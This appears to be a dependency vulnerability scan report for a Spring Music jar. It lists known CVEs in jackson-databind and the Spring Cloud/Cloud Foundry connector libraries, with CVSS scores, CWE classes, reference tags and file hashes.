af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2021-20190 suppress
A flaw was found in jackson-databind before 2.9.10.7. FasterXML mishandles the interaction between serialization gadgets and typing. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: HIGH (8.3) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:C References:
Vulnerable Software & Versions: (show all )
CVE-2018-12022 suppress
An issue was discovered in FasterXML jackson-databind prior to 2.7.9.4, 2.8.11.2, and 2.9.6. When Default Typing is enabled (either globally or for a specific property), the service has the Jodd-db jar (for database access for the Jodd framework) in the classpath, and an attacker can provide an LDAP service to access, it is possible to make the service execute a malicious payload. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H/E:1.6/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.1) Vector: /AV:N/AC:H/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY,VDB_ENTRY Vulnerable Software & Versions: (show all )
CVE-2019-12086 suppress
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint, the service has the mysql-connector-java jar (8.0.14 or earlier) in the classpath, and an attacker can host a crafted MySQL server reachable by the victim, an attacker can send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs because of missing com.mysql.cj.jdbc.admin.MiniAdmin validation. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY cve@mitre.org - EXPLOIT,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - RELEASE_NOTES,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY,VDB_ENTRY Vulnerable Software & Versions: (show all )
CVE-2019-14439 suppress
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9.2. This occurs when Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the logback jar in the classpath. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH af854a3a-2127-422b-91ae-364da2661108 - PATCH,PRODUCT af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH cve@mitre.org - PATCH,PRODUCT cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-36518 suppress
jackson-databind before 2.13.0 allows a Java StackOverflow exception and denial of service via a large depth of nested objects. CWE-787 Out-of-bounds Write
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2022-42003 suppress
In FasterXML jackson-databind before versions 2.13.4.1 and 2.12.17.1, resource exhaustion can occur because of a lack of a check in primitive value deserializers to avoid deep wrapper array nesting, when the UNWRAP_SINGLE_VALUE_ARRAYS feature is enabled. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,ISSUE_TRACKING,MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2022-42004 suppress
In FasterXML jackson-databind before 2.13.4, resource exhaustion can occur because of a lack of a check in BeanDeserializer._deserializeFromArray to prevent use of deeply nested arrays. An application is vulnerable only with certain customized choices for deserialization. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A References:
OSSINDEX - [CVE-2022-42004] CWE-502: Deserialization of Untrusted Data OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-42004 OSSIndex - https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490 OSSIndex - https://github.com/FasterXML/jackson-databind/issues/3582 af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,ISSUE_TRACKING,MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2018-1000873 suppress
Fasterxml Jackson version Before 2.9.8 contains a CWE-20: Improper Input Validation vulnerability in Jackson-Modules-Java8 that can result in Causes a denial-of-service (DoS). This attack appear to be exploitable via The victim deserializes malicious input, specifically very large values in the nanoseconds field of a time value. This vulnerability appears to have been fixed in 2.9.8. CWE-20 Improper Input Validation
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2019-12384 suppress
FasterXML jackson-databind 2.x before 2.9.9.1 might allow attackers to have a variety of impacts by leveraging failure to block the logback-core class from polymorphic deserialization. Depending on the classpath content, remote code execution may be possible. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2019-12814 suppress
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON message that allows them to read arbitrary local files on the server. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2023-35116 suppress
jackson-databind through 2.15.2 allows attackers to cause a denial of service or other unspecified impact via a crafted object that uses cyclic dependencies. NOTE: the vendor's perspective is that this is not a valid vulnerability report, because the steps of constructing a cyclic data structure and trying to serialize it cannot be achieved by an external attacker. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: MEDIUM (4.7) Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H/E:1.0/RC:R/MAV:A References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: spring-cloud-cloudfoundry-connector-2.0.1.RELEASE.jarDescription:
Spring Cloud Connectors Cloud Foundry Connector License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-cloud-cloudfoundry-connector-2.0.1.RELEASE.jar
MD5: 96180bb747a2db14684576adc81d6a82
SHA1: d723add3f7cd620235bb4b994551bb66fe9cffa0
SHA256: c913a8554214e9c24e3b58fbb6d9e4c6605518f510ea90cd7ae03a0ed5b15f41
Evidence Type Source Name Value Confidence Vendor central artifactid spring-cloud-cloudfoundry-connector Highest Vendor central groupid org.springframework.cloud Highest Vendor file name spring-cloud-cloudfoundry-connector High Vendor hint analyzer vendor pivotal software Highest Vendor hint analyzer vendor SpringSource Highest Vendor hint analyzer vendor vmware Highest Vendor jar package name cloud Low Vendor jar package name cloudfoundry Low Vendor jar package name springframework Low Vendor pom artifactid spring-cloud-cloudfoundry-connector Low Vendor pom developer id ramnivas Medium Vendor pom developer name Ramnivas Laddad Medium Vendor pom groupid org.springframework.cloud Highest Vendor pom name Spring Cloud Connectors Cloud Foundry Connector High Vendor pom organization name Spring IO High Vendor pom organization url http://projects.spring.io/spring-cloud Medium Vendor pom url spring-projects/spring-cloud Highest Product central artifactid spring-cloud-cloudfoundry-connector Highest Product file name spring-cloud-cloudfoundry-connector High Product jar package name cloud Low Product jar package name cloudfoundry Low Product jar package name com Low Product pom artifactid spring-cloud-cloudfoundry-connector Highest Product pom developer id ramnivas Low Product pom developer name Ramnivas Laddad Low Product pom groupid org.springframework.cloud Highest Product pom name Spring Cloud Connectors Cloud Foundry Connector High Product pom organization name Spring IO Low Product pom organization url http://projects.spring.io/spring-cloud Low Product pom url spring-projects/spring-cloud High Version central version 2.0.1.RELEASE Highest Version pom version 2.0.1.RELEASE Highest
CVE-2016-5006 suppress
The Cloud Controller in Cloud Foundry before 239 logs user-provided service objects at creation, which allows attackers to obtain sensitive user credential information via unspecified vectors. CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2016-6637 suppress
Multiple cross-site request forgery (CSRF) vulnerabilities in Pivotal Cloud Foundry (PCF) before 242; UAA 2.x before 2.7.4.7, 3.x before 3.3.0.5, and 3.4.x before 3.4.4; UAA BOSH before 11.5 and 12.x before 12.5; Elastic Runtime before 1.6.40, 1.7.x before 1.7.21, and 1.8.x before 1.8.2; and Ops Manager 1.7.x before 1.7.13 and 1.8.x before 1.8.1 allow remote attackers to hijack the authentication of unspecified victims for requests that approve or deny a scope via a profile or authorize approval page. CWE-352 Cross-Site Request Forgery (CSRF)
CVSSv3:
Base Score: CRITICAL (9.6) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2016-4468 suppress
SQL injection vulnerability in Pivotal Cloud Foundry (PCF) before 238; UAA 2.x before 2.7.4.4, 3.x before 3.3.0.2, and 3.4.x before 3.4.1; UAA BOSH before 11.2 and 12.x before 12.2; Elastic Runtime before 1.6.29 and 1.7.x before 1.7.7; and Ops Manager 1.7.x before 1.7.8 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors. CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
CVSSv3:
Base Score: HIGH (8.8) Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.5) Vector: /AV:N/AC:L/Au:S/C:P/I:P/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2016-6651 suppress
The UAA /oauth/token endpoint in Pivotal Cloud Foundry (PCF) before 243; UAA 2.x before 2.7.4.8, 3.x before 3.3.0.6, and 3.4.x before 3.4.5; UAA BOSH before 11.7 and 12.x before 12.6; Elastic Runtime before 1.6.40, 1.7.x before 1.7.21, and 1.8.x before 1.8.2; and Ops Manager 1.7.x before 1.7.13 and 1.8.x before 1.8.1 allows remote authenticated users to gain privileges by leveraging possession of a token. CWE-264 Permissions, Privileges, and Access Controls
CVSSv3:
Base Score: HIGH (8.8) Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.5) Vector: /AV:N/AC:L/Au:S/C:P/I:P/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2016-3084 suppress
The UAA reset password flow in Cloud Foundry release v236 and earlier versions, UAA release v3.3.0 and earlier versions, all versions of Login-server, UAA release v10 and earlier versions and Pivotal Elastic Runtime versions prior to 1.7.2 is vulnerable to a brute force attack due to multiple active codes at a given time. This vulnerability is applicable only when using the UAA internal user store for authentication. Deployments enabled for integration via SAML or LDAP are not affected. CWE-264 Permissions, Privileges, and Access Controls
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2016-6659 suppress
Cloud Foundry before 248; UAA 2.x before 2.7.4.12, 3.x before 3.6.5, and 3.7.x through 3.9.x before 3.9.3; and UAA bosh release (aka uaa-release) before 13.9 for UAA 3.6.5 and before 24 for UAA 3.9.3 allow attackers to gain privileges by accessing UAA logs and subsequently running a specially crafted application that interacts with a configured SAML provider. CWE-287 Improper Authentication
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: LOW (2.6) Vector: /AV:N/AC:H/Au:N/C:P/I:N/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2016-5016 suppress
Pivotal Cloud Foundry 239 and earlier, UAA (aka User Account and Authentication Server) 3.4.1 and earlier, UAA release 12.2 and earlier, PCF (aka Pivotal Cloud Foundry) Elastic Runtime 1.6.x before 1.6.35, and PCF Elastic Runtime 1.7.x before 1.7.13 does not validate if a certificate is expired. CWE-295 Improper Certificate Validation
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY secalert@redhat.com - RELEASE_NOTES,THIRD_PARTY_ADVISORY secalert@redhat.com - RELEASE_NOTES,THIRD_PARTY_ADVISORY secalert@redhat.com - RELEASE_NOTES,THIRD_PARTY_ADVISORY secalert@redhat.com - RELEASE_NOTES,THIRD_PARTY_ADVISORY secalert@redhat.com - RELEASE_NOTES,THIRD_PARTY_ADVISORY secalert@redhat.com - RELEASE_NOTES,THIRD_PARTY_ADVISORY secalert@redhat.com - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2016-6636 suppress
The OAuth authorization implementation in Pivotal Cloud Foundry (PCF) before 242; UAA 2.x before 2.7.4.7, 3.x before 3.3.0.5, and 3.4.x before 3.4.4; UAA BOSH before 11.5 and 12.x before 12.5; Elastic Runtime before 1.6.40, 1.7.x before 1.7.21, and 1.8.x before 1.8.1; and Ops Manager 1.7.x before 1.7.13 and 1.8.x before 1.8.1 mishandles redirect_uri subdomains, which allows remote attackers to obtain implicit access tokens via a modified subdomain. CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:N References:
Vulnerable Software & Versions: (show all )
spring-music-sqldb-1.0.jar: spring-cloud-connectors-core-2.0.1.RELEASE.jarDescription:
Spring Cloud Connectors Core License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-cloud-connectors-core-2.0.1.RELEASE.jar
MD5: dbb34ee8b5a2eb9bc6c52c1d8a0b1045
SHA1: 8aa0c1977cc592d475c56fdfedb2e79f0c026356
SHA256: 03b67f724c5fa181dfc786fcb744e06a35ef030a628d2007406c730f9d0591b8
